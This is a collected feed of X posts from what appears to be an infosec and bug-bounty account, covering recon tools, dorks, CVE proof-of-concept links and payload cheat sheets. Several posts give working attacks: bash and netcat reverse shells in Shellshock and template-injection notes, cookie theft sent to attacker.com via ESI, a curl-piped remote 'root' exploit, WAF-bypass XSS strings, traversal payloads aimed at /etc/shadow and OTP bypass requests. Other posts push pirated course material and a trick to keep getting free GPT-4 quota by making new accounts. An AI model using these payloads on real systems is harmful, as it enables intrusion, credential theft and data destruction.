"🧰UserFinder - OSINT tool for finding profiles by username 🌀Discover profiles across the web with this powerful Open Source Intelligence (OSINT) tool designed specifically for username searches. 🔻Installation: apt update apt upgrade apt install git git clone 🍷How to Use: cd UserFinder bash Now type Username you want to find on different Now you will see which username is on which platform and which is not"
X Link 2023-12-19T07:55Z 19.4K followers, 24.7K engagements

"GDorks - Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories ) Github #dork - Dorks(1M)/ - - Split #1.txt - Split #2.txt - Split #3.txt - . - More-Dorks/ - - 7k.txt - best2.txt - Amazon10k.txt - Gaming.txt - Shoping.txt - . - SQLi/ - - Sqli.txt - Sqli2.txt - . - XSS/ - - XSS.txt - . - LFI/ - - LFI.txt - . - WordPress/ - - 17k.txt - wp(30K).txt - . - Joomla/ - - Joomla.txt - Joomla2.txt - . - Laravel/ - - 1.txt - . - CCTV/ - - cctv.txt - . - Netflix/ - 48.txt - . - dorks.txtdorks.jsondorks2.txtdorks3.txtdorks-2023.txtdork"
X Link 2023-12-19T09:49Z 19.4K followers, 16.9K engagements

"100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost [--]. Comment Send to receive your link 📚 "I do not own this content. For any issues or concern please contact the rightful owner directly." Share this post to spread the word 👍 #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips @SaveToNotion @threadreaderapp #oscp #osed #oswe #osep #osce #pentest #hacking #infosecnotes #cybersecurity"
X Link 2023-12-20T04:58Z 19.4K followers, 41.3K engagements

"PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts Github: #POC #CVE https://github.com/dwisiswant0/cve-2023-50164-poc https://github.com/dwisiswant0/cve-2023-50164-poc"
X Link 2023-12-21T09:56Z 24K followers, [----] engagements

"ofbiz-CVE-2023-49070-RCE-POC This is a pre-auth RCE POC For CVE-2023-49070 which affected Apache ofbiz applications 18.12.10 due to xml-rpc java deserialzation bug. Repo: https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC"
X Link 2023-12-21T10:10Z 24K followers, [----] engagements

"Linux Privilege Escalation Cheatsheet So you got a shell what now This cheatsheet will help you with local enumeration as well as escalate your privilege further Usage of different enumeration scripts are encouraged my favourite is LinPEASAnother linux enumeration script I personally use is LinEnumAbuse existing functionality of programs using GTFOBins Note: This is a live document. Ill be adding more content as I learn more Unstable shell Send yourself another shell from within the unstable shell which nc nc $ip $port Make it functional Necessary for privilege escalation purposes which"
X Link 2023-12-21T18:18Z 28.1K followers, [----] engagements

"Oneliner XSS at scale cat domainlist.txt subfinder dnsx waybackurl egrep -iv ".(jpgjpeggifcsstiftiffpngttfwoffwoff2icopdfsvgtxtjs)" uro dalfox pipe -b -o xss.txt -- Happy hunting ❤ #hackerone#BugBounty#bugbountytips #hackeronereport #writeups#Bugbountywriteupspublished"
X Link 2023-12-23T07:21Z 22.3K followers, [----] engagements

"Fetch known URLs from AlienVault's Open Threat Exchange the Wayback Machine and Common Crawl"
X Link 2023-12-23T09:20Z 13.6K followers, 11.9K engagements

"🚨 New JavaScript malware alert It's stealing online banking credentials. Affected: Over 50000+ users across: - North America - South America - Europe - Japan Under Attack: Over [--] global financial institutions. Details here:"
X Link 2023-12-24T03:59Z 19.4K followers, [----] engagements

"🔒 Breaking News FBI hacks the hackers U.S. Justice Department disrupts the BlackCat ransomware operation the second most prolific RaaS variant and releases a FREE decryption tool saving victims from $68 million in ransom demands. Details:"
X Link 2023-12-24T04:00Z 22.3K followers, [----] engagements

"🎁Merry Christmas for everyone🎁🎄 Learn Ethical Hacking From Scratch 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost with everyone please 🙏 [--]. Comment Send to receive your link 📚 "I do not own this content. For any issues or concern please contact the rightful owner directly." Share this post to spread the word 👍 #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips @SaveToNotion"
X Link 2023-12-24T04:19Z 20.1K followers, 51.5K engagements

"CVE-2022-1040 - RCE in Sophos Firewall curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controllermode=8700&operation=1&datagrid=179&json="x":"test"' grep -q 'Session Expired' #CVE #RCE"
X Link 2023-12-25T07:47Z 24K followers, 23.8K engagements

"If you're on an engagement and you discover some /cgi-bin/ directory - it would be wise to fuzz for file names + ".cgi". Checking for CGI files either left behind from a default configuration or perhaps a developer who was utilizing it for debugging purposes is an important thing to check for. Lets suppose you found something like /cgi-bin/superadmin.cgi during your engagement. The first thing that should come to your mind is "I wonder if it's shellshock vulnerable". nc -nlvp [----] export CMD="bash -i & /dev/tcp/192.168.1.6/9997 0&1" curl -H "User-Agent: () :; ; /bin/bash -c 'echo aaaa; $CMD;"
X Link 2023-12-26T22:28Z [--] followers, [----] engagements

"CVE-2023-50254: Critical RCE in Deepin Linux Desktop OSs default document reader"
X Link 2023-12-28T07:21Z [--] followers, [----] engagements

"KING HACKING TOOL Commands : git clone cd King-Hacking bash"
X Link 2023-12-28T12:41Z [--] followers, 27.3K engagements

"🚀🚀Bug Bounty Tips🚀🚀🚀 # Exposed Source Code ## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys which may help malicious users formulate attacks against the application. ## Where to find - ## How to exploit [--]. Exposed Git folder GIT Tools to dump .git * [--]. Exposed Subversion folder SVN Tools to dump .svn * [--]. Exposed Mercurial folder HG Tools to dump .hg * [--]. Exposed Bazaar folder BZR Tools to dump .bzr * [--]. Exposed Darcs folder Tools to dump"
X Link 2023-12-29T22:05Z 22.3K followers, [----] engagements

"🔖8000+ XSS Payloads github 🐈 : #bugbounty #Infosec #xss https://github.com/radhasec/xss_payload https://github.com/radhasec/xss_payload"
X Link 2024-01-06T09:02Z 25.1K followers, 20.7K engagements

"Learn SQLi Query Fixing [--]. identify sqli vulnerability ' " [--]. balance the query http://192.168.1.103/sqli-labs-master/Less-1/id=1 front end select id ='id' where name ='xyz' background how to fix http://192.168.1.103/sqli-labs-master/Less-1/id=1' -- select id ='1' -- ' where name ='xyz' background Less-2 in background select id=1 -- where name =xyz how to fix query http://192.168.1.103/sqli-labs-master/Less-2/id=1 -- Less-3 in background select id = ('1') where name =('xyz') -------------------------------------------- SQLI Through Get Based Less-1"
X Link 2024-01-07T21:51Z 22.3K followers, 12.1K engagements

"Bounty Tips Collected From Twitter"
X Link 2024-01-08T14:40Z 22.3K followers, [----] engagements

"Tips to ur tests n hunts: #SQLi Polyglot* - test every ways encodes (hex url b64 and others ciphers). Look this sugestions: &1/'/"//1# or and-1/'/"//1-- #CyberSecurity #pentest #bugbounty #php #python #mariadb"
X Link 2024-01-09T05:05Z 22.3K followers, [----] engagements

"Stored XSS via cache poisoning 🧪 the Akamai WAF really annoyed me but the craft of this payload defeated it : "a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames'ale'+'rt')(Reflect.get(document'coo'+'kie'))" Credit: @zhero___ #bugbountytips #BugBounty #Hacking"
X Link 2024-01-10T03:53Z 25K followers, [----] engagements

"Daily Notes : Day [--] ESI Injcetion - Exploitation XSS - esi:include src=http://domain.com/xss.html COOKIE STEALING - esi:include src=http://attacker.com/$(HTTP_COOKIE) esi:include src="http://attacker.com/cookie=$(HTTP_COOKIE'JSESSIONID')" / AKAMAI DEBUG -esi:debug/ CRLF - esi:include src="http://domain.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/ XXE (ESI + XSLT) - esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" / Credit: @h4x0r_fr34k"
X Link 2024-01-11T21:05Z 22.3K followers, [---] engagements

"-150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: -151-enum4linux Cheat Sheet: -152-enumeration: -153-Command and Control WebSocket: -154-Command and Control WMI: -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: -156-Comprehensive Guide to Nmap Port Status: -157-Commix Automated All-in-One OS Command Injection and Exploitation Tool: -158-Compromising Jenkins and extracting credentials: -159-footprinting: -160-awesome-industrial-control-system-security: -161-xss-payload-list: -162-awesome-vehicle-security: -163-awesome-osint: -164-awesome-python:"
X Link 2024-01-12T03:38Z 15.6K followers, [---] engagements

"-184-Hidden directories and les as a source of sensitive information about web application: -185-Hiding Registry keys with PSRe ect: -186-awesome-cve-poc: -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: -188-Post Exploitation in Windows using dir Command: 189-Web Application Firewall (WAF) Evasion Techniques #2: -190-Forensics Investigation of Remote PC (Part 1): -191-CloudFront Hijacking: -192-PowerPoint and Custom Actions: -193-Privilege Escalation on Windows [----] Server [----] Server [----] using Potato: -194-How to intercept TOR hidden service"
X Link 2024-01-12T03:38Z 13.6K followers, [---] engagements

"-342-Security Harden CentOS [--] : -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: -344-MySQL: -345-Deobfuscation of VM based software protection: -346-Online Assembler and Disassembler: -347-Shellcodes database for study cases: -348-Dynamic Binary Analysis and Obfuscated Codes: -349-How Triton may help to analyse obfuscated binaries: -350-Triton: A Concolic Execution Framework: -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: -352-What kind of semantics information Triton can provide: -353-Code coverage using a dynamic symbolic execution:"
X Link 2024-01-12T03:40Z 22.3K followers, [---] engagements

"-375-The Complete List of Windows Post-Exploitation Commands (No Powershell): -376-The Art of Subdomain Enumeration: -377-The Principles of a Subdomain Takeover: -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise: -379-The Solution for Web for Pentester-I: -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: -381-: Ethical Hacking Hack Tools Hacking Tricks Information Gathering Penetration Testing Recommended: -383-Introduction to Exploitation Part 1: Introducing Concepts and Terminology: -384-How Hackers Kick Victims Off of Wireless"
X Link 2024-01-12T03:41Z 16.6K followers, [---] engagements

"USE CHAT GPT-4 FOR FREE 💁EXTENSION FOR KIWI BROWSER ON PHONE (USE DESKTOP MODE) AND FOR PC BROWSERS BASED ON CHROMIUM LINK : 💁EXTENSION FOR FIREFOX BROWSER MOBILE (DESKTOP MODE) AND PC FIREFOX BROWSER LINK : 💁EXTENSION OFFICAL WEBSITE: STEPS : [--]. MAKE ACCOUNT AFTER INSTALLATION OF EXTENSION [--]. USE USING POPUP SIDE ICON ON PAGE [--]. OF ACCOUNT GPT-4 QUOTA EXPIRES THEN MAKE NEW ACCOUNT AND USE AGAIN AS MUCH AS YOU WANT BY @Mr_Neophyte ✔Share with Your Mate"
X Link 2024-01-15T02:01Z 22.3K followers, [----] engagements

"CVE-2023-7028 Account-Take-Over Gitlab Repo: https://github.com/Vozec/CVE-2023-7028 https://github.com/Vozec/CVE-2023-7028"
X Link 2024-01-15T04:37Z 24K followers, [----] engagements

"🔖Here's [--] tools you can use to effectively find sensitive information in JS files: [--]. Hakrawler Extracting JavaScript files. 🔗Link : [--]. LinkFinder Finding Endpoints in JS files. 🔗Link : [--]. jsluice Extract URLs paths secrets and other interesting data from JavaScript source code. 🔗Link : Do you use anything else Let us know in the comments👇 #BugBounty #recon Credit:@hakluke"
X Link 2024-01-16T02:51Z 22.3K followers, 16.3K engagements

"Scripting for Hackers Learn to write scripts in BASH Perl and Python for cyber warriors"
X Link 2024-01-21T15:47Z 22.3K followers, 16.8K engagements

"Stored XSS via cache poisoning 🧪 the Akamai WAF really annoyed me but the craft of this payload defeated it : "a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames'ale'+'rt')(Reflect.get(document'coo'+'kie'))" #bugbountytips #BugBounty #Hacking Credit: @zhero___"
X Link 2024-01-26T07:03Z 22.7K followers, [----] engagements

""img src=x onerrora=confirm() onerror=confirm() Cloudflare WAF bypass to XSS that someone discovered a few years ago. It still works on most sites including the official Cloudflare site. Credit: Ignacio Laurence #infosec #hacking #hacker #cybersecurity #bugbountytips"
X Link 2024-01-26T18:14Z 22.4K followers, [---] engagements

"🔥Bob the Smuggler" is a tool that leverages HTML Smuggling Attack and allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots). The JavaScript embedded within the HTML will download the PNG/GIF file and store it in the cache. Following this the JavaScript will extract the data embedded in the PNG/GIF assemble it perform XOR decryption and then store it as an in-memory blob. Repo:"
X Link 2024-01-28T08:19Z 22.4K followers, [----] engagements

"Finally Found the Ultimate Pentesting Toolkits #Day1 As a security professional I'm always on the hunt for the best tools to stay ahead of the curve. After spending countless hours searching for a comprehensive list I stumbled upon three goldmines that I now use all the time: 🌟 Pentesting Tools Database by Christian Scott and Travis DeForge: This Notion site is a game-changer It's meticulously organized covering a vast array of tools for information gathering vulnerability analysis web applications database assessment and even password attacks. Plus many of the tools are open-source making"
X Link 2024-01-31T06:46Z 22.5K followers, 15.9K engagements

"Akamai WAF #XSS #Bypass A %252F=""Href= JavaScript:k='a'topk%2B'lert'(1)"
X Link 2024-01-31T20:28Z 22.4K followers, [----] engagements

"🚀 Exciting News 🚀 I've just conquered the Twister machine in my OSCP journey #Day7🕵♂💻 👨💻 Now I'm sharing my code and notes to help You🎯 🔗 Check out ==-Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --0pen nmap -p- --script=vuln $IP ###HTTP-Methods nmap --script http-methods --script-args http-methods. url-path='/webs ite ' ### sed IPs: grep -oE '((1 0-9 0-9 20-4 0- [--] 250-5).)3 (1 0-9 0-9 [--] 0-4 0-9 [--] 0-5 ) ' FILE --Script smb-enum-shares =EE======= =E==EE====E============E== EEE=E==E==: =========: == WPScan & SSL wpscan--url $URL --disable-tls-checks - -enumerate p --enumerate"
X Link 2024-02-05T07:40Z 24.2K followers, 18.6K engagements

"🚀🚀DISCOVERING DOMAIN🔥🔥🔥🔥 #DAY11 Look for Asn AMASS sudo amass enum -brute -d www.targett.mil -o target.txt -p [-----------------] sudo amass enum -active -brute -d www.targett.mil -o -p [-----------------] amass enum -v -src -ip -brute -min-for-recursive [--] -d ----------------------------------------------------------------- *amass asn amass intel -org TARGET -v amass intel -asn [------] -o ans.txt -v amass enum -d targett.com -o ubesubdoamin.txt -v hunting - Subdomain Enumeration Subfinder subfinder -d targett.com -o domain.txt subfinder -d targett.com -sources securitytrails *for look how"
X Link 2024-02-14T18:04Z 28.8K followers, 12.6K engagements

"Linux explorer Easy-to-use live forensics toolbox for Linux endpoints. : DaProfiler DaProfiler allows you to get emails social medias adresses works and more on your target using web scraping and google dorking techniques based in France Only. The particularity of this program is its ability to find your target's e-mail adresses.: Collection OSINT resources and tools So what is this all about Yep its an OSINT blog and a collection of OSINT resources and tools.: Tools and techniques related with Cloud Osint A repository with information related to differnet resources tools and techniques"
X Link 2024-02-17T06:58Z 22.7K followers, [----] engagements

"Ghost Recon An OSINT framework updated weekly wich with you can search on precise targets with a lot of features like person search criminal search or social media scanning with eamail/phone and ip changer. : Collector Collector is a tool for osint (open source intelligence). : Twayback Automate downloading archived deleted ets.: Opensquat Detection of phishing domains and domain squatting. Supports permutations such as homograph attack typosquatting and bitsquatting. : Telegram Trilateration Proof of concept for abusing Telegram's "People Near Me" feature and tracking people's location:"
X Link 2024-02-17T06:58Z 22.7K followers, [----] engagements

"🚀 Join us for an immersive exploration into live hacking web applications on Discord Our Hackers community offers a dynamic platform for collaborative learning and knowledge sharing. Feel free to engage by commenting or reaching out via direct message. We plan to showcase intricate hacking sessions for the community. We're eager to embark on this hacking journey with you 💻🔒 Access the free live event here: Discord Channel: Looking forward to hacking alongside you Greetings I'm hosting a live event on my Discord channel. Would you be interested in joining us We'll be showcasing live hacking"
X Link 2024-02-21T06:49Z 22.7K followers, [----] engagements

"🚀🚀Shodan-Dork🚀🚀 🔍 Prodect mysql found 👉product:MySQL 🔍 MongoDB 👉"MongoDB Server Information" -authentication 🔍 defult password 👉"default password" 🔍 guest login 👉 guest login ok 🔍 Jenkins Unrestricted Dashboard 👉x-jenkins [---] 🔍 wp config 👉http.html:"* The wp-config.php creation script uses this file" 🔍 root session 👉"root@" port:23 -login -password -name -Session 🔍 defult wireless password 👉html:"def_wirelesspassword" 🔍 Auth desabled 👉"authentication disabled" 🔍 dashboard 👉http.title:"dashboard" 🔍 control panel 👉http.title:"control panel" 🔍 phpmyadmin"
X Link 2024-03-25T07:26Z 22.7K followers, [--] engagements

"🔍 #Recon automation for #bughunters 1- Subdomain discovery with Subfinder: subfinder -dL targets.txt -all -recursive -o facebook.txt cat facebook.txt wc -l 2- Discover subdomains via curl -s jq -r '..name_value' grep -Po '(w+.w+.w+)$' anew subdomains-faceboo.txt cat subdomains-faceboo.txt wc -l 3- Check live subdomains with HTTPX: cat subdomains-faceboo.txt httpx -l subdomains-faceboo.txt -ports [-----------------] -threads [---] subdomains-faceboo-alive.txt cat subdomains-faceboo-alive.txt wc -l 4- Port scanning with Naabu: naabu -list subdomains-faceboo.txt -c [--] -nmap-cli 'nmap -sV -sC' -o"
X Link 2024-04-02T08:20Z 22.7K followers, [----] engagements

""💥 Exploit Alert: CVE-2024-1086 (Local Privilege Escalation) 🚨 Amidst the chaos of the xz backdoor this exploit stealthily emerged 🔥 Works on Linux kernels [----] to v6.6. 👉 Repo: 👤 Creator: @notselwyn #Cybersecurity #Linux #Vulnerability" http://github.com/Notselwyn/CVE-2024-1086 http://github.com/Notselwyn/CVE-2024-1086"
X Link 2024-04-06T18:02Z 23.4K followers, [----] engagements

"Happy Hunting 😎Explore the fascinating world of directory traversal 😎 [--]. ./ [--]. . [--]. ./ [--]. %2e%2e%2f [--]. %252e%252e%252f [--]. %c0%ae%c0%ae%c0%af [--]. %uff0e%uff0e%u2215 [--]. %uff0e%uff0e%u2216 [--]. . = %u002e [--]. / = %u2215 [--]. = %u2216 [--]. . = %c0%2e %e0%40%ae %c0ae [--]. / = %c0%af %e0%80%af %c0%2f [--]. = %c0%5c %c0%80%5c [--]. ././ [--]. .. [--]. .;/ [--]. .;/.;/sensitive.txt [--]. . = %252e [--]. / = %252f [--]. = %255c [--]. file:///etc/passwd [--]. http://127.0.0.1:8080 [--]. /etc/issue [--]. /etc/passwd [--]. /etc/shadow [--]. /etc/group [--]. /etc/hosts [--]. /etc/motd [--]. /etc/mysql/my.cnf [--]. /proc/0-9*/fd/0-9* (first"
X Link 2024-04-08T05:50Z 24.4K followers, [--] engagements

"🔖OTP Bypass Techniques [--]. Status Code Manipulation If Status Code is 4xx Try to change it to [---] OK and see if it bypass restrictions [--]. Try to send Empty OTP or Set NULL in the field of OTP that is otp=null to bypass POST /secondLogin HTTP/1.1 Host: Content-Type: application/json Content-Length: Number "email":"me""pass":"""otp":"" 🔗Reference [--]. Try to insert Zeros in the OTP Parameter that is [------] to bypass OTP POST /secondLogin HTTP/1.1 Host: Origin: Content-Length: Number "email":"me""pass":"""otp":"000000" [--]. If the request is in JSON Request an OTP"
X Link 2024-04-09T10:16Z 23.1K followers, 11K engagements

"@galnagli What are you talking about if you have [---] vdp @galnagli"
X Link 2024-04-17T05:26Z 23.4K followers, [----] engagements

"@PikuHaku @GodfatherOrwa @bxmbn 😂😂 every single program is vdp . Bring more excuses @PikuHaku like you say some program pay In the end they are VDP"
X Link 2024-04-18T08:50Z 23.4K followers, [---] engagements

"🕵Discover a wealth of learning materials in one place 📚🎓 [--]. Data Science [--]. Python [--]. Artificial Intelligence [--]. Big Data [--]. Data Analytics [--]. Google Cloud Platform [--]. IT Training [--]. MBA [--]. Cybersecurity Simply: [--]. Follow @TheMsterDoctor1 (So I Will Dm) 📥 [--]. Like and Repost [--]. Send me a private message Send to receive your link 📚 "I do not own this content. For any issues or concern please contact the rightful owner directly." Share this post to spread the word 👍 #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware"
X Link 2024-05-12T03:43Z 23.9K followers, [----] engagements

"🕵Discover a wealth of learning materials in one place 📚🎓 This link contains Tutorials + Books + Courses + Trainings + Educational Resources in: [--]. Data Science [--]. Python [--]. Artificial Intelligence [--]. Big Data [--]. Data Analytics [--]. Google Cloud Platform [--]. IT Training [--]. MBA [--]. Cybersecurity And much more Link: Simply: [--]. Follow @TheMsterDoctor1 [--]. Like and Repost "I do not own this content. For any issues or concern please contact the rightful owner directly." Share this post to spread the word 👍 #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking"
X Link 2024-05-12T20:27Z 23.9K followers, [----] engagements

"👁500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources 😀 💀Data science 💀Python 💀Artificial Intelligence . 💀AWS Certified . 💀Cloud 💀BIG DATA 💀Data Analytics 💀BI 💀Google Cloud Platform 💀IT Training 💀MBA 💀Machine Learning 💀Deep Learning 💀Ethical Hacking 💀SPSS 💀Statistics 💀Data Base 💀Learning language resources ( English French German ) And more 100% Free For First [----] User's. Simply: [--]. Follow @TheMsterDoctor1 (So I Will Dm) 📥 [--]. Like and Repost [--]. Send me a private message Send to receive your link 📚 "I do not own this content. For any issues"
X Link 2024-05-18T02:22Z 24.2K followers, 14.7K engagements

"## Advanced Google Dork Cheatsheet ### Search Filters and Descriptions #### Text Searches - allintext - Description: Searches for occurrences of all the keywords within the text of a page. - Example: allintext:"network security vulnerabilities" - intext - Description: Searches for the occurrences of any of the keywords within the text of a page. - Example: intext:"password" "login" #### URL Searches - inurl - Description: Searches for a URL containing one of the keywords. - Example: inurl:"admin" - allinurl - Description: Searches for a URL"
X Link 2024-08-03T04:41Z 25K followers, [----] engagements

"Google Dork Hunt for XSS SQLi API vulnerabilities & hidden endpoints python dork.py -d "site:*target filetype:php" #bugbountytips #bugbounty https://github.com/schooldropout1337/dork https://github.com/schooldropout1337/dork"
X Link 2024-09-22T06:16Z 25K followers, 12.1K engagements

"Offensive Security Tool: XSSRocket XSSRocket is developed by Chris Abou-Chabk from Black Hat Ethical Hacking and its a tool designed for Offensive Security and XSS (Cross-Site-Scripting) attacks. The tool tracks response codes marking success and failure and creates a detailed report of the findings saving them in a folder named after the domain. Some key features: ➡It supports Stealth Mode using Proxychains for more reliable attacks against defensive mechanisms. ➡It uses httpx to filter only active URLs and clear the values for each parameter. ➡It uses a remote XSS payload list from GitHub."
X Link 2024-10-11T21:43Z 24.7K followers, [----] engagements

"🚨 Is Your Sensitive Data at Risk on GitHub Learn About GitHub Dorking 🚨In the world of cybersecurity GitHub Dorking has become a powerful technique used by both ethical hackers and cybercriminals to uncover sensitive information left exposed in public repositories. API keys passwords and tokens are often inadvertently shared putting organizations at serious risk of data breaches. 🛡 💡 What Is GitHub Dorking GitHub Dorking involves using specific search queries to find secrets hidden within public repositories allowing attackers to access confidential information. The good news With the"
X Link 2024-10-16T22:48Z 25K followers, [---] engagements

"🔖Sudomain Enumeration - Favicon Search This Python tool calculates the hash of a given image (a favicon file or url) and then performs a search on Shodan to find webapps that use the same favicon. This is very useful to find subdomains during the recon process. 🧐Install git clone cd favicon-hashtrick pip3 install -r requirements.txt 🧑💻Usage $ python3 -f favicon_file $ python3 -k xxxxxxxxxxxxxxxxxxxxx -v ip_strhostnames -u favicon_url 📱 Github: 🔗Link #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools http://favicon-hashtrick.py http://favicon-hashtrick.py"
X Link 2025-01-04T19:48Z 25.2K followers, [----] engagements

"## Some Shodan Dorks that might be useful in Bug Bounty. [--]. org:"http://target. com" [--]. http.status:"status_code" [--]. product:"Product_Name" [--]. port:Port_Number Service_Message [--]. port:Port_Number Service_Name [--]. http.component:"Component_Name" [--]. http.component_category:"Component_Category [--]. http.waf:"firewall_name" [--]. http.html:"Name" [--]. http.title:"Title_Name" [--]. ssl.alpn:"Protocol" [--]. http.favicon.hash:"Favicon_Hash" [--]. net:"Net_Range" (for e.g. 104.16.100.52/32) [--]. .com" [--]. asn:"ASnumber" [--]. hostname:"hosthame" [--]. ip:"IP_Address" [--]. all:"Keyword" [--]. Set-Cookie: phpMyAdmin 20."
X Link 2025-03-23T23:52Z 25.2K followers, [----] engagements

"**✅The best one liner XSS ** subfinder -dL domainlist1.txt dnsx shuf (gau hakrawler) anew egrep -iv ".(jpgjpeggiftiftiffpngttfwoffwoff2phpicopdfsvgtxtjs)$" urless nilo dalfox pipe -b https://xss.hunter/q=1 #bugbountytips #bugbounty #xss"
X Link 2025-03-28T03:26Z 25.8K followers, [----] engagements

"🚀 NextSploit: Next.js CVE-2025-29927 Scanner & Exploiter NextSploit is a tool that detects and exploits CVE-2025-29927 a security flaw in Next.js Check it out: CREDIT:@AnonKryptiQuz #CyberSecurity #Pentesting #NextJS #Exploit #CTF #EthicalHacking #RedTeam #infosec https://github.com/AnonKryptiQuz/NextSploit https://github.com/AnonKryptiQuz/NextSploit https://github.com/AnonKryptiQuz/NextSploit https://github.com/AnonKryptiQuz/NextSploit"
X Link 2025-03-28T19:43Z 25.7K followers, 10.3K engagements

"## Special Tools Resolution - (DNS) - (DNS) - (HTTP) Wildcard DNS - - Reconnaissance - (fully-fledged recon service) - (DNS and subdomain recon) - Reverse IP (Domainmonitor) - Security (Security Report missing headers) - (WHOIS DNS email and subdomain recon) - (wide range of DNS-related recon tools) - (Source Code Search Engine) - (Find domains in the IP block owned by a Company/Organization) - HackerTarget (DNS recon site lookup and scanning tools) - (WHOIS DNS and subdomain recon) - (SSL certificate search) - Google (SSL certificate transparency search) - PenTest (Google"
X Link 2025-03-29T01:43Z 25.5K followers, [----] engagements

"## Template Injection Ruby ruby %=id% Twig The following payload should output [--]. 7*'7' Jinja This payload should output [-------]. 7*'7' 7-1"'baa nec rmt load file base [--] decode ssh "passthru('nc -e /bin/sh 10.0.2.15 8888');"@66.218.84.43 ssh "passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxMC4wLjIuMTUgODg4OAo==');"@66.218.84.43 # Basic server-side template injection %= 77 % %25%3d+77+%25 %= system("rm /home/carlos/morale.txt") % %25+system("rm+/home/carlos/morale.txt")+%25 rce %3C%=%20system(%22whoami%22)%20%%3E %20system(%22cat%20/etc/passwd%22)%20%%3E # Basic server-side"
X Link 2025-03-29T15:31Z 25.5K followers, [----] engagements

"Advanced Bug Bounty One-Liners 1.Recon Pipeline: Automates subdomain discovery port scanning and vulnerability detection: subfinder -d -all anew subs.txt; shuffledns -d -r resolvers.txt -w wordlist.txt anew subs.txt; dnsx -l subs.txt -r resolvers.txt anew resolved.txt; naabu -l resolved.txt -rate [-----] anew ports.txt; httpx -l ports.txt -silent -title -tech-detect -status-code anew live_hosts.txt; katana -list live_hosts.txt -depth [--] -silent anew urls.txt; nuclei -l urls.txt -severity highcritical -silent anew vulnerabilities.txt 2.JS File Extraction: Extract JavaScript files from live hosts:"
X Link 2025-03-30T19:14Z 25.6K followers, 12.3K engagements

"SubDominator helps you discover subdomains associated with a target domain efficiently and with minimal impact for your Bug Bounty #bugbounty #bugbountytips #bugbountytip https://github.com/RevoltSecurities/Subdominatortab=readme-ov-file https://github.com/RevoltSecurities/Subdominatortab=readme-ov-file"
X Link 2025-03-31T13:01Z 25.6K followers, [----] engagements

"🔥 CVE-2025-0401 - 7350pipe - Linux Privilege Escalation (All Versions) 🚨 Critical vuln affects ALL Linux versions 💀 Gain root with a single command: . (curl -fsSL 💡 Exploit breakdown: exploit with curl 2.Execute to gain root access 3.Verify with id -u 🔒 Mitigation: Patch ASAP & restrict local access #CyberSecurity #Linux #Exploit #PrivilegeEscalation #CVE2025 http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe"
X Link 2025-04-02T03:53Z 25.8K followers, 24.8K engagements

"🚀 Automate Bug Bounty Recon Like a Pro 💻 Step 1: Download All Domains from the Latest Update # Create a working directory mkdir bounty_targets && cd bounty_targets # Download the latest domains list wget -O domains.txt Step 2: Filter Main Domains # Extract main domains and save to a file cat domains.txt awk -F '.' 'print $(NF-1)"."$NF' grep -Eo '(a-zA-Z0-9-+.)+a-zA-Z2' sort -u main_domains.txt Step 3: Filter IP Addresses # Extract IP addresses from the domain list grep -Eo 'b(0-913.)30-913b' domains.txt ips.txt Step 4: Automate Updates and Monitoring (Using Cron) You can schedule the script"
X Link 2025-04-06T21:25Z 25.7K followers, [----] engagements

"🚨 Ethical Hackers:Heres my FULL blueprint for finding vulnerabilities companies miss (🧵):Follow if you want more advanced recon and bug bounty blueprints 🔥 Thread Content: 1/ Look where nobody else looks: Backup files (.zip .sql .bak) /admin/ /api/ /dev/ folders 2/ Abuse outdated endpoints via Wayback Machine. 3/ Check API docs for forgotten parameters and hidden methods. 4/ Upload fields = your best RCE opportunities. 5/ URL parameter fuzzing still wins (id= redirect_uri= page=). 6/ Look at Content Security Policies to find 3rd party buckets. 7/ Target misconfigurations before 0-days. 8/"
X Link 2025-04-28T22:05Z 25.9K followers, [----] engagements

